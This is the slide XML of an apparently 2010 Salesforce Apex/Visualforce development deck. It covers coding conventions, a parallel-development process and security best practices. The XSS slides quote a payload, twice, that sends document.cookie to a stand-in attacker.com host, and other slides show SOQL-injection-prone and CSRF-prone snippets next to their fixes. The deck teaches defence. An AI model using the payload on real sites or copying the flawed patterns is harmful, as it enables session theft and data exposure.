            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" smtClean="0"/>
              <a:t>If you need to refer to a component (example : DOM navigation), do not try to refer to the server-side generated IDs but use the global variable $Component instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="9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If you need to define CSS styles do not do it directly in your page but use Static Ressources instead, with the &lt;apex:stylesheet&gt; tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>Example :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" smtClean="0"/>
              <a:t>&lt;apex:stylesheet value="{!$Resource.example_css"}"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>If you need to define Javascript functions do not do it directly in your page but use Static Ressources instead, with the &lt;apex:includeScript&gt; tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>Example :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" smtClean="0"/>
              <a:t>&lt;apex:includeScript value="{!$Resource.example_js"}/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1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&lt;PAD – Parallel Development&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509588" y="2057400"/>
            <a:ext cx="8177212" cy="3733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Due to a short time frame on projects, triggers and classes can require to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>developed in parallel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>. N developers can develop in Apex, on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>same objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>. The PAD Process (Parallel Development) will be described in the next slides.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PAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>consist of allowing multiple developers to create Apex Code on the same object trigger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without impact on code coverage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Without impact on behavior (no failure due to another code under development)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PAD allows to identify quickly what has been developed in Apex, so you can define a queue of developments (developer take the first Apex Code not yet developed)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PAD increases productivity, quality and time-to-market because of a 2-phasis process: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b="1" dirty="0" smtClean="0"/>
              <a:t>Pad Spec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b="1" dirty="0" smtClean="0"/>
              <a:t>Pad Dev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 smtClean="0"/>
              <a:t>PAD is securing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>VisualForce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> and Apex projects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>harmonizing developments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sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t> 	and deliverables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.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7200" y="990600"/>
            <a:ext cx="81772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139489" tIns="69745" rIns="139489" bIns="69745"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GB" sz="1200">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill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9538" y="685800"/>
            <a:ext cx="141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6151" name="AutoShape 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="7136607" y="-615157"/>
            <a:ext cx="381000" cy="2220913"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60000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52" name="AutoShape 21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6718300" y="869950"/>
            <a:ext cx="1011238" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49921"/>
            </a:avLst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53" name="AutoShape 22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7474507" y="922894"/>
            <a:ext cx="209550" cy="1716561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25954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04800"/>
            <a:ext cx="488004" cy="533400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838200"/>
            <a:ext cx="488004" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2" descr="http://t2.gstatic.com/images?q=tbn:ANd9GcRnIWt8HDXPag07paBSos-_QFeMBDX12qEKwM7EKkVwqx7l2PAFEN5YD2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143000"/>
            <a:ext cx="488004" cy="533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Wrapper class&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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509588" y="892174"/>
            <a:ext cx="8177212" cy="207962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If you need to display a list of records with Checkbox you should use a wrapper class :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Example : the user have to select several products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>This is fully explained during the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Salesforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> 501 Training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>A full example can be found at this address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>http://wiki.developerforce.com/index.php/Wrapper_Class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="1600" dirty="0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22263" y="3260725"/>
            <a:ext cx="4076700" cy="32162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class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ClassController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&lt;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&gt;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contactList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{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set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&lt;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&gt;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getContacts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contactList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null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contactList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&lt;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&gt;();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 c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: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[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select Id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,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Name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,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Phone from Contact limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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]){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    contactList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add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contactList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PageReference processSelected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&lt;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&gt;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selectedContacts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List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&lt;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&gt;();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cContact cCon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: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getContacts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()){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selected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selectedContacts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add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cCon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System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debug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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'These are the selected Contacts...'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 con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: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selectedContacts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    system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.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debug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null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class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{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Contact con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{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set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Boolean selected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{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set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700">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public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cContact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(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Contact c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){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con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c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selected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=</a:t>
            </a:r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700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false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;}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fr-FR" sz="700" b="1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fr-FR" sz="7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625975" y="3109913"/>
            <a:ext cx="4335463" cy="200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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>controller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ClassController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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apex:form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apex:pageBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apex:pageBlockButtons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5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apex:commandButton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Process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 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Selected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processSelected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}"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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rerender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"table"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/&gt;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apex:pageBlockButtons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apex:pageBlockTable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"{!contacts}"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"c"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"table"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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apex:column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="50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apex:inputCheckbox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c.selected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}"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/&gt;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apex:column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apex:column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c.con.Id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}"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/&gt;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apex:column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c.con.Phone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}"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/&gt;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apex:column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"{!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c.con.Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="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/&gt;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apex:pageBlockTable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apex:pageBlock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apex:form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fr-FR" sz="500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apex:page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5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fr-FR" sz="500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389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57800"/>
            <a:ext cx="2217738" cy="1490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E8E8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Security Best Practices&gt;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62050"/>
            <a:ext cx="8177212" cy="5162550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every Apex/Visual force code should address the following Key areas for Security Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>control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 leverage Force.com security scanner to identify vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://security.force.com/security/tools/forcecom/scanner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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– XSS – What to avoid&gt;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62050"/>
            <a:ext cx="8177212" cy="51625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Don’t use Visual force merge variables directly in Javascript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&lt;script&gt;var foo = '{!Board.Message_Posting__c}';&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t> 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Malicious code can be executed if If Message_Posting__c were to contain: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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo='2“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Don’t use $CurrentPage.parameters directly in Javascript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&lt;script&gt;var foo = '{!$CurrentPage.parameters.userparam}';&lt;/script&gt; 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Malicious code can be executed if If Page is invoked with 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userParam = “1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo='2“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Never trust URL Parameters nor the Data entered by users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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– XSS – How to fix it?&gt;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62050"/>
            <a:ext cx="8177212" cy="51625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Use the in built encoding functions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mtClean="0"/>
              <a:t>JSENCODE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mtClean="0"/>
              <a:t>JSINHTMLENCODE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mtClean="0"/>
              <a:t>SUBSTITUTE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mtClean="0"/>
              <a:t>HTMLENCODE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&lt;script&gt;var foo = ‘{!JSENCODE(Board.Message_Posting__c)}';&lt;/script&gt; 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&lt;script&gt;var foo = '{!JSENCODE($CurrentPage.parameters.userparam)}';&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Do not use “escape=false” on &lt;apex:output&gt; tags unless absolutely required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//Overrides anti-XSS filters in built into the platform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/>
              <a:t>&lt;apex:outputText escape="false" value="{!$CurrentPage.parameters.userInput}" /&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>For more information visit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://wiki.developerforce.com/index.php/Security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SOQL Injection&gt;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2050"/>
            <a:ext cx="8177213" cy="5314950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use standard static SOQL syntax whenever applicable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>If you use Dynamic SOQL, use “bind” variables.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String qryString = 'SELECT Id FROM Contact WHERE (IsDeleted = false and Name like \'%' + name + '%\')'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Prone to SOQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>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String qryString = 'SELECT Id FROM Contact WHERE (IsDeleted = false and Name like :nameParam)'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Prevents SOQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use String.escapeSingleQuotes to further sanitize your user input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0969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sz="2600" dirty="0" smtClean="0"/>
              <a:t>How to safeguard from CSRF attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;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62050"/>
            <a:ext cx="8177212" cy="5391150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Do not do DML operations in “initialization”/”constructor” methods of the Apex controller</a:t>
            </a:r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333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;apex:page controller="myClass" action="{!init}"&lt;/apex:page&gt; </a:t>
            </a:r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333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public class myClass {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public void init() {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	Id id = ApexPages.currentPage().getParameters().get('id');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      Account obj = [select id, Name FROM Account WHERE id = :id];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      delete obj;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	return ; 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sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Always require “user confirmation” through an explicit intermediate page.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Data Access control 1/2&gt;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762000"/>
            <a:ext cx="8177212" cy="5314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Use the “with sharing” in Apex components whenever possible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Honors sharing settings and rules to prevent unauthorized access to data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>If using “system mode” for Apex controller code ensure there are additional constraints on the  SOQL to limit access to what the user is entitled to view.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600" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Opens user’s access to account data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List&lt;Accounts&gt; accList = [select Id,Name from Account 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where Name = :ApexPages.currentPageReference().getParameters().get(‘Name’)] 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Setup Org level sharing model and sharing settings suitably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VisualForce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Access control 2/2&gt;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162050"/>
            <a:ext cx="8177212" cy="5162550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Object.Read privilege allows users to navigate to “list views” even if Object tab is “hidden” for a profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User wrapper Apex classes or controller variables instead of SObject fields if the end user does not need “Read” access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&lt;apex:outputText value=“{!controllerVariable}”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>			instead of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;apex:outputText value=“{!Opportunity.StageName}”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> syntax does not require the user’s profile to have ”Read” on Opportunity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609600" y="2184400"/>
            <a:ext cx="8035925" cy="22860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&lt;PAD/Spec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sample1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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876800" y="3276600"/>
            <a:ext cx="4267200" cy="1200150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/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mtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reengineering : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AP12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mtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2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mtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apex development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906463" y="5992813"/>
            <a:ext cx="798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Aft>
                <a:spcPct val="25000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technical Design</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | January 26, 2010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52400" y="1524000"/>
            <a:ext cx="8818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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" i="1"/>
              <a:t>ustomer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" i="1"/>
              <a:t>elationship </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" i="1"/>
              <a:t>anagement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962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SF6038_PS_Diagrams_0801_2analy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 descr="SF6038_PS_Diagrams_08011plan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SF6038_PS_Diagrams_0801_3design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SF6038_PS_Diagrams_0801_5val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 descr="SF6038_PS_Diagrams_0801_6deplo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 descr="SF6038_PS_Diagrams_0908_4buil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AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="22860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177" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="22860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3200400" y="2971800"/>
            <a:ext cx="1247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PAD Spec</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/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4648200" y="2971800"/>
            <a:ext cx="1133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/>
              <a:t>PAD Dev</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/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3314700" y="4546600"/>
            <a:ext cx="942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1400"/>
              <a:t>Technical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Architect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4572000" y="4572000"/>
            <a:ext cx="134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sz="1400"/>
              <a:t>Developers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7184" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4572000"/>
            <a:ext cx="14128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/>
              <a:t>Resources :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7185" name="Line 72"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="45720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86" name="Line 73"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="5029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87" name="AutoShape 74"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="51054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188" name="AutoShape 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="51054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189" name="Text Box 76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="5746750"/>
            <a:ext cx="685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900"/>
              <a:t>Detailed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900"/>
              <a:t>technical</a:t>
            </a:r>
            <a:br>
